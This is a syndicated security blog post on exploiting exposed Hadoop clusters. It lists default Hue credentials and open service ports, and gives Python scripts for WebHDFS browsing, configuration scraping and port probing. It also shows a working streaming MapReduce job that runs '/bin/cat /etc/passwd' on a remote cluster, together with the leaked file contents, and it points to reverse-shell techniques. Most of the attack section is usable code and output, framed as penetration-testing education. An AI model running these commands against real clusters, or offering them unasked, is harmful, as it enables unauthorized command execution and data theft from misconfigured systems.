DevOoops: Hadoop

What is Hadoop?

The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures.
from: http://hadoop.apache.org/

If you’ve ever heard of MapReduce…you’ve heard of Hadoop.

NFI what I'm talking about? Here is a 3-minute video on it: https://www.youtube.com/watch?v=8wjvMyc01QY

What are common issues with MapReduce / Hadoop?

Hadoop injection points from Kaluzny's ZeroNights talk:

Hue

Common default credentials: admin/admin, cloudera/cloudera



Although occasionally you’ll find one that will just let you pick your own 🙂

If you gain access, you get full HDFS access, can run queries, etc.

HDFS WebUI

HDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070 on the NameNode. Accessing http://namenode:50070/ with a web browser will return a page containing overview information about the health, capacity, and usage of the cluster (similar to the information returned by bin/hadoop dfsadmin -report).




From this interface, you can browse HDFS itself with a basic file-browser interface. Each DataNode exposes its file browser interface on port 50075.
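
If you'd rather script the browsing than click through it, here is a minimal sketch. It assumes WebHDFS (the REST API that normally shares the NameNode web port) is enabled on the target, which is not something this post verified. The host name and the sample response are made up for illustration; only the URL layout and the LISTSTATUS field names follow the WebHDFS format.

```python
import json
from urllib.parse import quote


def webhdfs_list_url(namenode, path="/", port=50070):
    """Build a WebHDFS LISTSTATUS URL for a path on the NameNode web port."""
    return f"http://{namenode}:{port}/webhdfs/v1{quote(path)}?op=LISTSTATUS"


def parse_liststatus(body):
    """Turn a LISTSTATUS JSON body into (type, owner, length, name) tuples."""
    statuses = json.loads(body)["FileStatuses"]["FileStatus"]
    return [(s["type"], s["owner"], s["length"], s["pathSuffix"]) for s in statuses]


# Hypothetical response body, shaped like a WebHDFS LISTSTATUS reply.
SAMPLE = """{"FileStatuses": {"FileStatus": [
  {"pathSuffix": "tmp", "type": "DIRECTORY", "owner": "hdfs", "length": 0},
  {"pathSuffix": "a.txt", "type": "FILE", "owner": "root", "length": 18}
]}}"""

if __name__ == "__main__":
    print(webhdfs_list_url("namenode", "/tmp"))
    for entry in parse_liststatus(SAMPLE):
        print(entry)
```

To use it against a real cluster you would fetch the URL (for example with urllib.request.urlopen) and pass the response body to parse_liststatus.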


Update: The Hadoop Attack Library is worth checking out.
https://github.com/wavestone-cdt/hadoop-attack-library

Most up-to-date presentation on the Hadoop Attack Library: https://www.slideshare.net/phdays/hadoop-76515903

It includes a section on remote command execution (RCE): https://github.com/CERT-W/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Executing%20remote%20commands

You'll need the cluster configuration info exposed at ip:50070/conf
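
The /conf page returns the cluster configuration as XML, so pulling out the few values a remote client needs is easy to script. This is a rough sketch: the list of "interesting" property names is my own pick, and the sample document is invented, although it follows the standard Hadoop configuration layout (property / name / value).

```python
import xml.etree.ElementTree as ET

# Properties a remote client usually cares about; this selection is an assumption.
WANTED = ("fs.defaultFS", "yarn.resourcemanager.address", "mapreduce.framework.name")


def extract_properties(conf_xml, wanted=WANTED):
    """Return {name: value} for the wanted properties found in a /conf dump."""
    root = ET.fromstring(conf_xml)
    found = {}
    for prop in root.iter("property"):
        name = prop.findtext("name")
        if name in wanted:
            found[name] = prop.findtext("value")
    return found


# Hypothetical excerpt of a /conf response (host names are made up).
SAMPLE_CONF = """<configuration>
<property><name>fs.defaultFS</name><value>hdfs://namenode.example:8020</value><source>core-site.xml</source></property>
<property><name>yarn.resourcemanager.address</name><value>namenode.example:8032</value><source>yarn-site.xml</source></property>
<property><name>dfs.replication</name><value>3</value><source>hdfs-site.xml</source></property>
</configuration>"""

if __name__ == "__main__":
    for name, value in extract_properties(SAMPLE_CONF).items():
        print(f"{name} = {value}")
```

The extracted values are what you would copy into your local core-site.xml and yarn-site.xml so the hadoop client points at the remote cluster.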




TL;DR: find the correct open Hadoop ports and run a MapReduce job against the remote Hadoop server.

You need to be able to access the following Hadoop services through the network:
  • YARN ResourceManager: usually on ports 8030, 8031, 8032, 8033 or 8050
  • NameNode metadata service in order to browse the HDFS datalake: usually on port 8020
  • DataNode data transfer service in order to upload/download files: usually on port 50010
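
A quick way to check which of those ports you can actually reach is a plain TCP connect test. The sketch below uses only the ports listed above; the function names and the timeout are arbitrary choices of mine, and an open port only tells you something is listening, not that it is Hadoop.

```python
import socket

# Ports from the list above, mapped to the service they usually belong to.
HADOOP_PORTS = {
    8030: "YARN ResourceManager",
    8031: "YARN ResourceManager",
    8032: "YARN ResourceManager",
    8033: "YARN ResourceManager",
    8050: "YARN ResourceManager",
    8020: "NameNode metadata service",
    50010: "DataNode data transfer",
}


def is_open(host, port, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan(host, ports=HADOOP_PORTS, timeout=2.0):
    """Return {port: reachable} for every port in the given mapping."""
    return {port: is_open(host, port, timeout) for port in ports}
```

Calling scan("1.2.3.4") returns a dict of port numbers to True/False, which you can line up against HADOOP_PORTS to see which services are exposed.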



Let’s see it in action:

lookupfailed-2:hadoop CG$ hadoop jar /usr/local/Cellar/hadoop/2.7.3/libexec/share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar -input /tmp/a.txt -output blah_blah -mapper "/bin/cat /etc/passwd" -reducer NONE

17/01/05 22:11:40 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/hadoop-unjar5960812935334004257/] [] /var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/streamjob4422445860444028358.jar tmpDir=null
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at nope.members.linode.com/1.2.3.4:8032
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at nope.members.linode.com/1.2.3.4:8032
17/01/05 22:11:43 INFO mapred.FileInputFormat: Total input paths to process : 1
17/01/05 22:11:43 INFO mapreduce.JobSubmitter: number of splits:2
17/01/05 22:11:44 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1483672290130_0001
17/01/05 22:11:45 INFO impl.YarnClientImpl: Submitted application application_1483672290130_0001
17/01/05 22:11:45 INFO mapreduce.Job: The url to track the job: http://nope.members.linode.com:8088/proxy/application_1483672290130_0001/
17/01/05 22:11:45 INFO mapreduce.Job: Running job: job_1483672290130_0001
17/01/05 22:12:00 INFO mapreduce.Job: Job job_1483672290130_0001 running in uber mode : false
17/01/05 22:12:00 INFO mapreduce.Job:  map 0% reduce 0%
17/01/05 22:12:10 INFO mapreduce.Job:  map 100% reduce 0%
17/01/05 22:12:11 INFO mapreduce.Job: Job job_1483672290130_0001 completed successfully
17/01/05 22:12:12 INFO mapreduce.Job: Counters: 30
File System Counters
FILE: Number of bytes read=0
FILE: Number of bytes written=240754
FILE: Number of read operations=0
FILE: Number of large read operations=0
FILE: Number of write operations=0
HDFS: Number of bytes read=222
HDFS: Number of bytes written=2982
HDFS: Number of read operations=10
HDFS: Number of large read operations=0
HDFS: Number of write operations=4
Job Counters 
Launched map tasks=2
Data-local map tasks=2
Total time spent by all maps in occupied slots (ms)=21171
Total time spent by all reduces in occupied slots (ms)=0
Total time spent by all map tasks (ms)=21171
Total vcore-milliseconds taken by all map tasks=21171
Total megabyte-milliseconds taken by all map tasks=21679104
Map-Reduce Framework
Map input records=1
Map output records=56
Input split bytes=204
Spilled Records=0
Failed Shuffles=0
Merged Map outputs=0
GC time elapsed (ms)=279
CPU time spent (ms)=1290
Physical memory (bytes) snapshot=209928192
Virtual memory (bytes) snapshot=3763986432
Total committed heap usage (bytes)=65142784
File Input Format Counters 
Bytes Read=18
File Output Format Counters 
Bytes Written=2982
17/01/05 22:12:12 INFO streaming.StreamJob: Output directory: blah_blah

lookupfailed-2:hadoop CG$ hadoop fs -ls blah_blah
17/01/05 22:12:22 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 3 items
-rw-r--r--   3 root supergroup          0 2017-01-05 22:12 blah_blah/_SUCCESS
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00000
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00001
lookupfailed-2:hadoop CG$ hadoop fs -cat blah_blah/part-00001
17/01/05 22:12:49 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
hduser:x:1000:1000:,,,:/home/hduser:/bin/bash
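
If you want to swap the mapper command around without fighting shell quoting, you can build the same streaming invocation as an argument list. This is just a sketch of the command from the transcript above: the helper name is mine, and the jar path is the one from my Homebrew install, so adjust it for yours.

```python
import shlex


def streaming_command(jar, input_path, output_dir, mapper, reducer="NONE"):
    """Return the argv list for a Hadoop streaming job (map-only by default)."""
    return [
        "hadoop", "jar", jar,
        "-input", input_path,
        "-output", output_dir,
        "-mapper", mapper,    # the command each map task runs on the cluster
        "-reducer", reducer,  # NONE skips the reduce phase
    ]


argv = streaming_command(
    "/usr/local/Cellar/hadoop/2.7.3/libexec/share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar",
    "/tmp/a.txt",
    "blah_blah",
    "/bin/cat /etc/passwd",
)

# Print a copy-pasteable, correctly quoted version of the command.
print(shlex.join(argv))
```

Passing argv to subprocess.run keeps the mapper string as a single argument, which is exactly what the quotes in the original command are for. Remember the output directory must not already exist in HDFS, so pick a new name for each run.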



http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

The Hack.lu slides above walk you through how to get reverse shells or Meterpreter shells (Windows) if you can run commands.




Resources:
http://2015.zeronights.org/assets/files/03-Kaluzny.pdf

Video of the above talk from AppSec EU 2015: https://www.youtube.com/watch?v=ClXKGI8AzTk
http://hackedexistence.com/downloads/Cloud_Security_in_Map_Reduce.pdf

https://media.blackhat.com/bh-us-10/presentations/Becherer/BlackHat-USA-2010-Becherer-Andrew-Hadoop-Security-slides.pdf 

https://securosis.com/assets/library/reports/Securing_Hadoop_Final_V2.pdf

https://github.com/CERT-W/hadoop-attack-library

https://www.sans.org/score/checklists/cloudera-security-hardening

http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

http://www.cloudera.com/documentation/enterprise/latest/topics/cdh_ig_ports_cdh5.html


What did I miss?  Anything to add?

*** This is a Security Bloggers Network syndicated blog from Carnal0wnage & Attack Research Blog authored by CG. Read the original post at: http://carnal0wnage.attackresearch.com/2017/06/devooops-in-memory-databases-hadoop.html